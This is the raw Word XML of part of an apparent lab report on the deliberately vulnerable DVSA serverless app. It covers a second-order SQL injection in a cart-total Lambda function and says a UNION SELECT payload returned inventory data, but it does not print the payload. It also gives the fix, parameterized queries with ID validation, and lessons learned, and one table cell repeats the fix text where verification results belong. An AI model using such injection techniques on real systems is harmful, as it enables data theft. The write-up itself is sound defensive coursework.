          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table A</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9709" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2084"/>
        <w:gridCol w:w="2081"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D84B64" w14:paraId="25064DEE" w14:textId="77777777" w:rsidTr="005C68CF">
        <w:trPr>
          <w:trHeight w:val="902"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2084" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA0003F" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00051D50">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B3643E7" w14:textId="718552C6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Intended Rule(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD7FF02" w14:textId="55C3DDC6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Artifacts Used to Infer Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BCE5EBA" w14:textId="1DB1B243" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Normal Behavior Evi dence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4714E1BB" w14:textId="423E2FBC" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00D84B64">
              <w:t>xploit Behavior Evi dence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D84B64" w14:paraId="3618346C" w14:textId="77777777" w:rsidTr="005C68CF">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2084" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DE856EF" w14:textId="453C3E63" w:rsidR="00D84B64" w:rsidRDefault="005C68CF" w:rsidP="00051D50">
            <w:r w:rsidRPr="005C68CF">
              <w:t>Second-Order SQL Injection in Cart Total Calculation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="555C06DC" w14:textId="018A562E" w:rsidR="00D84B64" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
            <w:r w:rsidRPr="005C68CF">
              <w:t>Cart item IDs must be treated as data only. Stored cart values must not become executable SQL during billing. The cart-total function must calculate prices only for valid product IDs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467FFF76" w14:textId="01CB344B" w:rsidR="00D84B64" w:rsidRDefault="005C68CF" w:rsidP="00051D50">
            <w:r w:rsidRPr="005C68CF">
              <w:t>Browser workflow, /order API request, curl output, CloudWatch logs, Lambda cart-total behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37782E08" w14:textId="5F7A62DF" w:rsidR="00D84B64" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
            <w:r w:rsidRPr="005C68CF">
              <w:t>A normal cart with item ID 1 should create an order, accept shipping, and calculate billing normally</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188AAC6B" w14:textId="60EFE43C" w:rsidR="00D84B64" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
            <w:r w:rsidRPr="005C68CF">
              <w:t>CloudWatch showed the injected UNION SELECT payload and the result Found item: 1. Price: inventory, Quantity: 0.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64C42F67" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00991330"/>
    <w:p w14:paraId="5010B3A8" w14:textId="007839E6"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Pr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table B:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9837" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1503"/>
        <w:gridCol w:w="1819"/>
        <w:gridCol w:w="1683"/>
        <w:gridCol w:w="1948"/>
        <w:gridCol w:w="2884"/>
      </w:tblGrid>
      <w:tr w:rsidR="00991330" w14:paraId="76CA67A6" w14:textId="77777777" w:rsidTr="00991330">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F402AC4" w14:textId="2B6A2B3C" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="00BA72A1">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB58ADA" w14:textId="59267A70" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Why This Is a Deviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9CAB62" w14:textId="19D58B0C" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Deviation Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128DC4CD" w14:textId="77777777" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Fix</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Applied</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B678E84" w14:textId="63C3B740" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="007A6D07">
            <w:r>
              <w:t>(where)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2884" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ED33578" w14:textId="70139375" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Post-Fix Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00991330" w14:paraId="346904DB" w14:textId="77777777" w:rsidTr="00991330">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF73447" w14:textId="526340D9" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="00991330">
            <w:r w:rsidRPr="00991330">
              <w:t>Second-Order SQL Injection in Cart Total Calculation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9D7411" w14:textId="2664C6DA" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="00991330">
            <w:r w:rsidRPr="00991330">
              <w:t>The backend reused attacker-controlled stored data as part of a SQL query. This violates the intended rule that cart item IDs must remain validated data and must not affect SQL query structure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1683" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767A75B5" w14:textId="4C0DB5E1" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="00991330">
            <w:r w:rsidRPr="00991330">
              <w:t>Intentional misuse / security-relevant abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5302902C" w14:textId="0516EED7" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="00991330">
            <w:r w:rsidRPr="00991330">
              <w:t>Added item ID validation and parameterized SQL queries in DVSA-GET-CART-TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2884" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2461C5B9" w14:textId="58D13C85" w:rsidR="00991330" w:rsidRDefault="00991330" w:rsidP="00991330">
            <w:r w:rsidRPr="00991330">
              <w:t>Added item ID validation and parameterized SQL queries in DVSA-GET-CART-TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46AEC6D9" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="70E163AC" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="19F2D1DB" w14:textId="7EA07071" w:rsidR="00956299" w:rsidRDefault="00956299" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00956299">
        <w:lastRenderedPageBreak/>
        <w:t>Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46974DCC" w14:textId="75A1EB93" w:rsidR="00473D1F" w:rsidRDefault="00473D1F" w:rsidP="00FD0C77">
      <w:r>
        <w:t>This vulnerability shows that input validation must be applied across the entire serverless workflow, not only when data first enters the system. In this case, the malicious cart item value was accepted during order creation and became dangerous later when the cart-total Lambda reused it during billing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3EA9D0" w14:textId="5FD75D3D" w:rsidR="00473D1F" w:rsidRDefault="00473D1F" w:rsidP="00FD0C77">
      <w:r>
        <w:t>The main security lesson is that stored data should not automatically be trusted. Even if a value comes from DynamoDB or another backend storage layer, it may still originally come from a user-controlled request. Therefore, every Lambda function that reads and processes stored data must treat it as untrusted until it is validated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8CCAB2" w14:textId="68057C88" w:rsidR="00473D1F" w:rsidRPr="00473D1F" w:rsidRDefault="00473D1F" w:rsidP="00473D1F">
      <w:r>
        <w:t>This issue is especially important in serverless applications because one user request can pass through several AWS services and Lambda functions. A weakness in one stage can appear later in another stage, making the vulnerability harder to notice. The correct secure design principle is to validate input at every trust boundary, use allowlists for expected values such as product IDs, and always use parameterized database queries instead of building SQL statements through string concatenation.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00473D1F" w:rsidRPr="00473D1F" w:rsidSect="000A57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A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31C81FAE"/>
    <w:lvl w:ilvl="0" w:tplc="2F202BBC">
      <w:start w:val="5"/>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31B50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A43ADE72"/>
    <w:lvl w:ilvl="0" w:tplc="B5BA2292">
      <w:start w:val="8"/>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B170F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B82E242"/>
    <w:lvl w:ilvl="0" w:tplc="38822450">
      <w:start w:val="4"/>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14000"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1430C1D0"/>
    <w:lvl w:ilvl="0" w:tplc="241E0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8285038"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34367130"/>
    <w:lvl w:ilvl="0" w:tplc="DAF47334">
      <w:start w:val="9"/>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033359"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E263E4C"/>
    <w:lvl w:ilvl="0" w:tplc="397CA8E0">
      <w:start w:val="1"/>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C544DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C6DA46"/>
    <w:lvl w:ilvl="0" w:tplc="E5CA34DA">
      <w:start w:val="7"/>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2A463F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAFE5424"/>
    <w:lvl w:ilvl="0" w:tplc="4ED47D16">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="44"/>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AB7353"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AE86CD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213267"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6F61438"/>
    <w:lvl w:ilvl="0" w:tplc="5386C422">
      <w:start w:val="3"/>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947D80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A58EC3F0"/>
    <w:lvl w:ilvl="0" w:tplc="83248F16">
      <w:start w:val="6"/>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EE67A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="165889A8"/>
    <w:lvl w:ilvl="0" w:tplc="C86E9D9C">
      <w:start w:val="2"/>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102762">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="379283219">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="462114230">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1307512281">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="475538599">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="780494637">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1139763358">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="149761307">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1891768054">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="553077378">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="314800575">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="314725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04"/>
    <w:rsid w:val="0008558F"/>
    <w:rsid w:val="0009190F"/>
    <w:rsid w:val="000A57D4"/>
    <w:rsid w:val="00142AD2"/>
    <w:rsid w:val="00400D29"/>
    <w:rsid w:val="0043544F"/>
    <w:rsid w:val="00473D1F"/>
    <w:rsid w:val="005052DF"/>
    <w:rsid w:val="00533DCD"/>
    <w:rsid w:val="005C68CF"/>
    <w:rsid w:val="005C76E2"/>
    <w:rsid w:val="005F2D61"/>
    <w:rsid w:val="006568BA"/>
    <w:rsid w:val="006F4AB2"/>
    <w:rsid w:val="00716DBB"/>
    <w:rsid w:val="007A6D07"/>
    <w:rsid w:val="007B2AE4"/>
    <w:rsid w:val="007F1665"/>
    <w:rsid w:val="008D3221"/>
    <w:rsid w:val="00932450"/>
    <w:rsid w:val="00956299"/>
    <w:rsid w:val="00991330"/>
    <w:rsid w:val="009A083D"/>
    <w:rsid w:val="00BA72A1"/>
    <w:rsid w:val="00C06B04"/>
    <w:rsid w:val="00C922FF"/>
    <w:rsid w:val="00CC56D8"/>
    <w:rsid w:val="00CF3286"/>
    <w:rsid w:val="00D84B64"/>
    <w:rsid w:val="00EB4FD7"/>
    <w:rsid w:val="00F24FB8"/>
    <w:rsid w:val="00FD0C7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8070"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DBD19FAC-6F11-419D-8EFE-DB2F017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04"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00C0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04"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00C0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04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF3286"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF3286"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007A6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B6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dvsa-website-test-546079881937-us-east-1.s3-website.us-east-1.amazonaw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11</Pages>
  <Words>1737</Words>
  <Characters>9903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REDHA ABDULAZIZ ALTURAIK</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ali aloryd</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T14:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-03T09:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>